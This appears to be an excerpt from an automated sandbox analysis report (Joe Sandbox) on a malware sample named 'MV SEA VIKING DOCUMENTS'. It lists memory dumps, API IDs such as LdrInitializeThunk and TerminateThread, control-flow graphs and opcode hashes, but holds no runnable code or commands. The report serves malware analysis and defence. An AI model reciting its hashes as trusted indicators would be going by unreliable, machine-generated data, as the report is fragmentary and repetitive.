                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F0E9F1801701AFF7054E26CC4C74977A5AF153B1F1582889C53574B1E7A8C9818F51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 037a6f63f2f60b74c508b412744e64d699d5d242105f5a343f3b74ddfe4b58e2
                                                                                                                                                                                                                                • Instruction ID: 3a3e9113e5f692888800aa8ada7f390de5f30a33b4c348b3c9215d36a01db07b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 037a6f63f2f60b74c508b412744e64d699d5d242105f5a343f3b74ddfe4b58e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E590022121180442D700A5684D14B4B008647D0303FD2C51AF0154514CC969C8616522
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: eb59e3de01d5615f716c1b2eb7954d89b6bbddb8ad4506f8d9eee917625f3c62
                                                                                                                                                                                                                                • Instruction ID: 5586cde2f6fa20db4610dd20b698e2bd8306b3028f0ca2ea350cb80c39c479b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb59e3de01d5615f716c1b2eb7954d89b6bbddb8ad4506f8d9eee917625f3c62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D290026134100842D600A1584514B4A008687E1301FD2C41AF1064514DC66DCC527127
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: cd4960969ae0fe3d36f59771c5cc6878435618b0dda6aceb3a3e25960c9ef902
                                                                                                                                                                                                                                • Instruction ID: bb4d22b9c0fb667d0eabf4914ba99e4a5dd4f0747ff67cbe009217cb4b18289c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd4960969ae0fe3d36f59771c5cc6878435618b0dda6aceb3a3e25960c9ef902
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C890023120140802D600A158491474F008647D0302FD2C416F1164515DC679C8517572
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 9eea0c39d4437950926574fb945eb0d193b6c5896325782a447ec0f3dcfd9d14
                                                                                                                                                                                                                                • Instruction ID: b55b89b936c7066af731559656a7131c5e9e662a31501d0f1cb620d920dbd95f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eea0c39d4437950926574fb945eb0d193b6c5896325782a447ec0f3dcfd9d14
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB900221601004424640B1688944A4A40866BE12117D2C526F0998510DC5ADC8656666
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: ab7c5dc912df8a5734722175a6dd358d69f40e304ea4834cef11352f7fb20faa
                                                                                                                                                                                                                                • Instruction ID: 0a586a243c28d9ecd9574cf2e7ccc88bb7960ef3211599f2677279ff40e664df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab7c5dc912df8a5734722175a6dd358d69f40e304ea4834cef11352f7fb20faa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6490023120100813D611A158460474B008A47D0241FD2C817F0424518DD6AAC952B122
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 3b912473f77cee5f90a1c0f9f626f9269a470b835ebf37780e7622629bb12d9d
                                                                                                                                                                                                                                • Instruction ID: f3ace9081e70aff836f7dfd7ff49c989c78d879b753456fc32557ff0bbb84be7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b912473f77cee5f90a1c0f9f626f9269a470b835ebf37780e7622629bb12d9d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A90022160100902D601B158450475A008B47D0241FD2C427F1024515ECA79C992B132
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 38fdd6f19bdcabe51dccabf7edf5bf2a763ce4174183ecf49240ced4dc87244a
                                                                                                                                                                                                                                • Instruction ID: 7462002c6380d6f3e4954ea688cfaac88908db97221a0a508dc6c6700a1434f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38fdd6f19bdcabe51dccabf7edf5bf2a763ce4174183ecf49240ced4dc87244a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8590027120100802D640B158450478A008647D0301FD2C416F5064514EC6ADCDD57666
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 124 1f212c30-1f212c3c LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 95a5de794ea91b099150d507af50cd93b18bfbcb25b0b1bc5db5f9f352adb1d0
                                                                                                                                                                                                                                • Instruction ID: b8a91d2f696d67dae7e9755700195b20433ed8bed231077df303fce469f2b61f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95a5de794ea91b099150d507af50cd93b18bfbcb25b0b1bc5db5f9f352adb1d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5690022921300402D680B158550874E008647D1202FD2D81AF0015518CC969C8696322
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: dbc46f1200e6057c09da40e60ade311deacb2583fd9a344f0705b1f7bc3fb708
                                                                                                                                                                                                                                • Instruction ID: edac0950a42e8d5290d8caffc0095563b7a91011a8b17aa3eea7d6ef21910c55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbc46f1200e6057c09da40e60ade311deacb2583fd9a344f0705b1f7bc3fb708
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE90022130100403D640B158551874A408697E1301FD2D416F0414514CD969C8566223
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: e5b1f53c8f52da287ef060b830b619ff0af15382fa5e03c8d5024bebc3b8e534
                                                                                                                                                                                                                                • Instruction ID: e24f5647d549da56848210b245ba6c2b4953aee91c40afd0960979e8ad0ca901
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5b1f53c8f52da287ef060b830b619ff0af15382fa5e03c8d5024bebc3b8e534
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE900221242045525A45F158450464B408757E02417D2C417F1414910CC57AD856E622
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 121 1f212b10-1f212b1c LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: ed6b8e6fe0012c32e2e4088420accc51ef7349e7f8a25c0ea576620486418b98
                                                                                                                                                                                                                                • Instruction ID: 91c32770aec16b2ffbfeb544ba22a4821c239424ed5d1543d4de9ff60b0bf16e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed6b8e6fe0012c32e2e4088420accc51ef7349e7f8a25c0ea576620486418b98
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E190023120100C02D680B158450478E008647D1301FD2C41AF0025614DCA69CA5977A2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 122 1f212b90-1f212b9c LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 435df2b9b93f0672876b9a54c22f484fe1dea57e9bf8829d2813c2e6c2be4c71
                                                                                                                                                                                                                                • Instruction ID: 25fbba6f2dc6d78312c8daf3f7ad4e2eeb6851d481dd37045ed8e853821240bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 435df2b9b93f0672876b9a54c22f484fe1dea57e9bf8829d2813c2e6c2be4c71
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C90023120108C02D610A158850478E008647D0301FD6C816F4424618DC6E9C8917122
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 123 1f212bc0-1f212bcc LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 69f28779ac645612a3a6cd521356d48a79d0089ba6f14ad383803994b072e85a
                                                                                                                                                                                                                                • Instruction ID: f8dab6c406b2e6a2c3072a24a42952dd1f31afe528505f0b0f0f8f340f0115ff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f28779ac645612a3a6cd521356d48a79d0089ba6f14ad383803994b072e85a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F790023120100802D600A598550878A008647E0301FD2D416F5024515EC6B9C8917132
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 120 1f2129f0-1f2129fc LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 13 1671001-16710cd TerminateThread 17 1671237-167124f 13->17 18 16710d3-16710dc 13->18 18->17 19 16710e2-16710e6 18->19 19->17 20 16710ec-16710f0 19->20 20->17 21 16710f6-16710fa 20->21 21->17 22 1671100-1671104 21->22 22->17 23 167110a-167110e 22->23 23->17 24 1671114-167114d 23->24 24->17 26 1671153-167116d 24->26 27 167116e-1671182 26->27 28 16711d5-167121f 27->28 29 1671184-1671188 27->29 32 1671221-1671232 28->32 33 167125b-167125f 28->33 29->17 31 167118e-16711d3 29->31 31->27 35 1671260-16712c6 33->35 37 16712c8-16712ca 35->37
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: TerminateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1852365436-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 38 167100a-1671082 TerminateThread 40 1671089-16710cd 38->40 42 1671237-167124f 40->42 43 16710d3-16710dc 40->43 43->42 44 16710e2-16710e6 43->44 44->42 45 16710ec-16710f0 44->45 45->42 46 16710f6-16710fa 45->46 46->42 47 1671100-1671104 46->47 47->42 48 167110a-167110e 47->48 48->42 49 1671114-167114d 48->49 49->42 51 1671153-167116d 49->51 52 167116e-1671182 51->52 53 16711d5-167121f 52->53 54 1671184-1671188 52->54 57 1671221-1671232 53->57 58 167125b-167125f 53->58 54->42 56 167118e-16711d3 54->56 56->52 60 1671260-16712c6 58->60 62 16712c8-16712ca 60->62
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: TerminateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1852365436-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 116 1f212b2a-1f212b2f 117 1f212b31-1f212b38 116->117 118 1f212b3f-1f212b46 LdrInitializeThunk 116->118
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1700792311
                                                                                                                                                                                                                                • Opcode ID: 13b4cfb5ab6dece8d7373e402661fc2e597a1ef1817300812cd1088d395ffe48
                                                                                                                                                                                                                                • Instruction ID: 020b4b37d62d2b2d5e0e0eb1968de70a14f5dcbd4961a18f876c77e8d8721da8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13b4cfb5ab6dece8d7373e402661fc2e597a1ef1817300812cd1088d395ffe48
